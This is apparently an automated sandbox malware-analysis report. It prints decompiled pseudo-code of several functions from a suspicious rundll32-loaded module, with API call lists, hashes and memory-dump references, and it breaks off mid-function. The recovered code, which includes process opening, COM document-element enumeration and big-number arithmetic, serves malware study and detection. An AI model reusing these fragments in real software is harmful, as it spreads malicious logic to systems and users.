                                          • API String ID: 1819133394-0
                                          • Opcode ID: 62cc9f0df4ef51a79f759903d4318df565a89b021acd8c031f785933e59b73b4
                                          • Instruction ID: 5e246341d6fd1cc58839bc1c7b3a38057f733b56933c7da6984cdbda52cdbe93
                                          • Opcode Fuzzy Hash: 62cc9f0df4ef51a79f759903d4318df565a89b021acd8c031f785933e59b73b4
                                          • Instruction Fuzzy Hash: 02214C76A00209AFDB019FACCC44A9EBF79EF95304F058195ED48AB304D735E91ACBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04BF9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04BF6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04BFA96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4bfd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04bf9fe7
                                          0x04bf9ff4
                                          0x04bf9ff6
                                          0x04bfa059
                                          0x00000000
                                          0x04bfa059
                                          0x04bfa00e
                                          0x04bfa015
                                          0x04bfa021
                                          0x04bfa026
                                          0x04bfa028
                                          0x04bfa02a
                                          0x04bfa02c
                                          0x04bfa02e
                                          0x04bfa030
                                          0x04bfa03c
                                          0x04bfa04c
                                          0x00000000
                                          0x04bfa03e
                                          0x04bfa03e
                                          0x04bfa045
                                          0x04bfa052
                                          0x04bfa052
                                          0x04bfa052
                                          0x04bfa045
                                          0x04bfa03c
                                          0x04bfa057
                                          0x00000000
                                          0x00000000
                                          0x04bfa05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA021
                                          • ResetEvent.KERNEL32(?), ref: 04BFA026
                                          • GetLastError.KERNEL32 ref: 04BFA03E
                                          • GetLastError.KERNEL32(?,?,00000102,04BF66AF,?,?,00000000,00000000), ref: 04BFA059
                                            • Part of subcall function 04BF6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?,?,00000000), ref: 04BF6B7A
                                            • Part of subcall function 04BF6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BFA006,?,?,?,?,00000102,04BF66AF,?), ref: 04BF6BD8
                                            • Part of subcall function 04BF6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6BE8
                                          • SetEvent.KERNEL32(?), ref: 04BFA04C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 52e5cc968eb8547e707bc7e598d2accb15918578561bafaee014562b02b462cb
                                          • Instruction ID: ddec6bcc3f5dd5b79bc6138b604ac26073b228607df5f4cbe78fa962a3a04621
                                          • Opcode Fuzzy Hash: 52e5cc968eb8547e707bc7e598d2accb15918578561bafaee014562b02b462cb
                                          • Instruction Fuzzy Hash: 2F014B31100201AEDB306A75EC44F5BBBA9FF48764F108A65FB5D920E0D725F81E9A61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF6A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF6A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4bfd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4bfd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4bfd258 = _t6;
					 *0x4bfd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4bfd254 = _t7;
					if(_t7 == 0) {
						 *0x4bfd254 =  *0x4bfd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04bf6a87
                                          0x04bf6a8d
                                          0x04bf6a94
                                          0x00000000
                                          0x04bf6aee
                                          0x04bf6a96
                                          0x04bf6a9e
                                          0x04bf6aab
                                          0x04bf6aab
                                          0x04bf6aeb
                                          0x00000000
                                          0x04bf6aeb
                                          0x04bf6aad
                                          0x04bf6aad
                                          0x04bf6ab2
                                          0x04bf6ac4
                                          0x04bf6ac9
                                          0x04bf6acf
                                          0x04bf6ad5
                                          0x04bf6adc
                                          0x04bf6ade
                                          0x04bf6ade
                                          0x00000000
                                          0x04bf6ae5
                                          0x04bf6aa7
                                          0x00000000
                                          0x00000000
                                          0x04bf6aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BF90D2,?), ref: 04BF6A87
                                          • GetVersion.KERNEL32 ref: 04BF6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04BF6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BF6ACF
                                          • GetLastError.KERNEL32 ref: 04BF6AEE
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 48b04c7d580e82141e2492df24ff4729f23f8e8a5f9191467e91f38eb42a7656
                                          • Instruction ID: ca84ca1241cc435545969f4bbdfc007d3ac2e832e4dc581c151d4ce27705c7a9
                                          • Opcode Fuzzy Hash: 48b04c7d580e82141e2492df24ff4729f23f8e8a5f9191467e91f38eb42a7656
                                          • Instruction Fuzzy Hash: 94F01970640306ABEB208BB5AC19B157B65E744741F10855BEE4FC71C0E6B8E89BCB75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF91B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E04BF91B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4bfd2a4; // 0x24da5a8
					_t5 = _t103 + 0x4bfe038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4bfc298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4bfd2a4; // 0x24da5a8
												_t28 = _t109 + 0x4bfe0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4bfd2a4; // 0x24da5a8
														_t33 = _t79 + 0x4bfe078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x04bf91ba
                                          0x04bf91c3
                                          0x04bf91c4
                                          0x04bf91c8
                                          0x04bf91ce
                                          0x04bf91d4
                                          0x04bf91dd
                                          0x04bf91e3
                                          0x04bf91ed
                                          0x04bf91ef
                                          0x04bf91f5
                                          0x04bf91fa
                                          0x04bf9205
                                          0x04bf920b
                                          0x04bf9210
                                          0x04bf9332
                                          0x04bf9216
                                          0x04bf9216
                                          0x04bf9223
                                          0x04bf9229
                                          0x04bf922f
                                          0x04bf9233
                                          0x04bf9239
                                          0x04bf9246
                                          0x04bf924a
                                          0x04bf9250
                                          0x04bf9253
                                          0x04bf925b
                                          0x04bf925c
                                          0x04bf9260
                                          0x04bf9264
                                          0x04bf9267
                                          0x04bf926a
                                          0x04bf9270
                                          0x04bf9279
                                          0x04bf927f
                                          0x04bf9280
                                          0x04bf9283
                                          0x04bf9284
                                          0x04bf9285
                                          0x04bf928d
                                          0x04bf928e
                                          0x04bf928f
                                          0x04bf9291
                                          0x04bf9295
                                          0x04bf9299
                                          0x00000000
                                          0x00000000
                                          0x04bf929f
                                          0x04bf92a8
                                          0x04bf92ae
                                          0x04bf92b8
                                          0x04bf92bc
                                          0x04bf92be
                                          0x04bf92cb
                                          0x04bf92cf
                                          0x04bf92d7
                                          0x04bf92dc
                                          0x04bf92ee
                                          0x04bf92f0
                                          0x04bf92f6
                                          0x04bf92f6
                                          0x04bf92ff
                                          0x04bf92ff
                                          0x04bf9301
                                          0x04bf9307
                                          0x04bf9307
                                          0x04bf930a
                                          0x04bf9310
                                          0x04bf9313
                                          0x04bf931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf931c
                                          0x04bf9270
                                          0x04bf926a
                                          0x04bf9253
                                          0x04bf9322
                                          0x04bf9322
                                          0x04bf9328
                                          0x04bf9328
                                          0x04bf932e
                                          0x04bf932e
                                          0x04bf9337
                                          0x04bf933d
                                          0x04bf933d
                                          0x04bf91fa
                                          0x04bf9346

                                          APIs
                                          • SysAllocString.OLEAUT32(04BFC298), ref: 04BF9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04BF92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF92FF
                                          • SysFreeString.OLEAUT32(?), ref: 04BF932E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 8cd1f9bbd521b414f9f8fd665c54d23fd0d1242d5a84db5d6c5eea142b967e47
                                          • Instruction ID: 0308e552a9c977b4d04a625c002107e7f0c8266cc1f40bd07a890ac21ccbdc1c
                                          • Opcode Fuzzy Hash: 8cd1f9bbd521b414f9f8fd665c54d23fd0d1242d5a84db5d6c5eea142b967e47
                                          • Instruction Fuzzy Hash: 0C513EB5D00519EFCB00DFE8C888DAEB7B9FF89704B144595E919EB260D731AD46CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF7664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E04BF7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04BF48F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04BF748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04BF7074(_t101,  &_v236, _a8, _t96 - _t81);
					E04BF7074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04BF748A(_t101, 0x4bfd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04BF748A(_a16, _a4);
						E04BF2FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04BFB088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04BFB082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04BF6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04BF15CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04BF687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4bfd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x04bf7667
                                          0x04bf7673
                                          0x04bf7679
                                          0x04bf767e
                                          0x04bf7682
                                          0x04bf77df
                                          0x04bf77e3
                                          0x04bf77e3
                                          0x04bf7688
                                          0x04bf768c
                                          0x04bf7690
                                          0x04bf7693
                                          0x04bf769e
                                          0x04bf76a4
                                          0x04bf76a9
                                          0x04bf76ac
                                          0x04bf76c6
                                          0x04bf76d2
                                          0x04bf76db
                                          0x04bf76e5
                                          0x04bf76ea
                                          0x04bf76ec
                                          0x04bf76ef
                                          0x04bf779d
                                          0x04bf77a3
                                          0x04bf77b4
                                          0x04bf77c7
                                          0x04bf77d7
                                          0x00000000
                                          0x04bf77dc
                                          0x04bf76f8
                                          0x04bf76ff
                                          0x04bf7703
                                          0x04bf7709
                                          0x04bf770b
                                          0x04bf770d
                                          0x04bf770f
                                          0x04bf7711
                                          0x04bf771b
                                          0x04bf7720
                                          0x04bf7722
                                          0x04bf7724
                                          0x04bf7725
                                          0x04bf7726
                                          0x04bf7727
                                          0x04bf772e
                                          0x04bf7735
                                          0x04bf7738
                                          0x04bf7738
                                          0x04bf7705
                                          0x04bf7705
                                          0x04bf7705
                                          0x04bf7740
                                          0x04bf7748
                                          0x04bf7751
                                          0x04bf7756
                                          0x04bf7756
                                          0x04bf775b
                                          0x00000000
                                          0x00000000
                                          0x04bf775d
                                          0x04bf7760
                                          0x04bf776a
                                          0x00000000
                                          0x00000000
                                          0x04bf776c
                                          0x04bf776c
                                          0x04bf7776
                                          0x04bf7756
                                          0x04bf775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf775b
                                          0x04bf7780
                                          0x04bf7783
                                          0x04bf7786
                                          0x04bf778d
                                          0x04bf778d
                                          0x04bf779a
                                          0x00000000
                                          0x04bf779a
                                          0x04bf7695
                                          0x04bf7699
                                          0x04bf769a
                                          0x04bf769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BF7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BF7727
                                          • memset.NTDLL ref: 04BF77C7
                                          • memset.NTDLL ref: 04BF77D7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: f49b83cfd98b76836efca14f09a175f0951f3a4227b02126f6822a15d1fd0f70
                                          • Instruction ID: 9f05467183613796c739cc2d1373207707c6f0158b5e7010746fe768951e0ed2
                                          • Opcode Fuzzy Hash: f49b83cfd98b76836efca14f09a175f0951f3a4227b02126f6822a15d1fd0f70
                                          • Instruction Fuzzy Hash: 42416431600259ABDB10EFA8DC40FDE7775EF44714F1085E9FA1EA7180EB71BA598B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04BFA97E
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • ResetEvent.KERNEL32(?), ref: 04BFA9F2
                                          • GetLastError.KERNEL32 ref: 04BFAA15
                                          • GetLastError.KERNEL32 ref: 04BFAAC0
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 5ce8fad2bb5a0630450a7b4b9292dd3ba3abc354043042355def9c92a7ba2469
                                          • Instruction ID: 8c74fd7c6c3582beceab69d736d8a02178f3c531862a889072a477556d44bdab
                                          • Opcode Fuzzy Hash: 5ce8fad2bb5a0630450a7b4b9292dd3ba3abc354043042355def9c92a7ba2469
                                          • Instruction Fuzzy Hash: E6418E71500204BFE7319FA5CD48E5B7BBDEB89700B14496AF64FD20A0D735EA59DA30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF8F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04BF8F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x4bfd138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4bfd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04BF58BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x4bfd138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04BF147E(_v16);
							if(_t58 == 0) {
								_t58 = E04BF16DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04BF9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04BF9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x04bf8f17
                                          0x04bf8f1c
                                          0x04bf8f1e
                                          0x04bf8f23
                                          0x04bf8f24
                                          0x04bf8f29
                                          0x04bf8f2a
                                          0x04bf8f35
                                          0x04bf8f66
                                          0x04bf8f6b
                                          0x04bf902e
                                          0x04bf9031
                                          0x04bf9037
                                          0x04bf9037
                                          0x04bf8f78
                                          0x04bf8f80
                                          0x04bf902b
                                          0x00000000
                                          0x04bf902b
                                          0x04bf8f8b
                                          0x04bf8f90
                                          0x04bf8f95
                                          0x04bf901d
                                          0x04bf901e
                                          0x04bf901e
                                          0x04bf9024
                                          0x00000000
                                          0x04bf9024
                                          0x04bf8f9b
                                          0x04bf8f9d
                                          0x04bf8fa3
                                          0x04bf8fa4
                                          0x04bf8fa4
                                          0x04bf8fa7
                                          0x04bf8faa
                                          0x04bf8fb0
                                          0x04bf8fb5
                                          0x04bf8fb6
                                          0x04bf8fbb
                                          0x04bf8fbe
                                          0x04bf8fc9
                                          0x00000000
                                          0x00000000
                                          0x04bf8fd1
                                          0x04bf8fd9
                                          0x04bf9002
                                          0x04bf9005
                                          0x04bf900c
                                          0x04bf9017
                                          0x04bf9017
                                          0x00000000
                                          0x04bf900c
                                          0x04bf8fe5
                                          0x04bf8fe9
                                          0x00000000
                                          0x00000000
                                          0x04bf8feb
                                          0x04bf8ff0
                                          0x00000000
                                          0x00000000
                                          0x04bf8ff2
                                          0x04bf8ff2
                                          0x04bf8ff7
                                          0x00000000
                                          0x00000000
                                          0x04bf8ff9
                                          0x04bf8ffa
                                          0x04bf8ffd
                                          0x04bf8ffd
                                          0x04bf8fa4
                                          0x04bf8f3d
                                          0x04bf8f45
                                          0x04bf8f5e
                                          0x04bf8f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf8f60
                                          0x04bf8f51
                                          0x04bf8f55
                                          0x00000000
                                          0x00000000
                                          0x04bf8f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04BF8F1E
                                          • GetLastError.KERNEL32 ref: 04BF8F37
                                            • Part of subcall function 04BF9D3A: WaitForMultipleObjects.KERNEL32(00000002,04BFAA33,00000000,04BFAA33,?,?,?,04BFAA33,0000EA60), ref: 04BF9D55
                                          • ResetEvent.KERNEL32(?), ref: 04BF8FB0
                                          • GetLastError.KERNEL32 ref: 04BF8FCB
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: dfdb56ba1000d2c9aedea02468ae4cd9ec5abdb7f52f29ac70189ec7cb75d143
                                          • Instruction ID: 117e82ec3c102b0f6c622abce3e06be41fd88a7657e8cf2fe871262f22c6fa83
                                          • Opcode Fuzzy Hash: dfdb56ba1000d2c9aedea02468ae4cd9ec5abdb7f52f29ac70189ec7cb75d143
                                          • Instruction Fuzzy Hash: 9931A772600604AFDB229FB8CC44F5E77B9FF88354F1405A9EA59D7190EB70F9499B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF72F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E04BF72F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
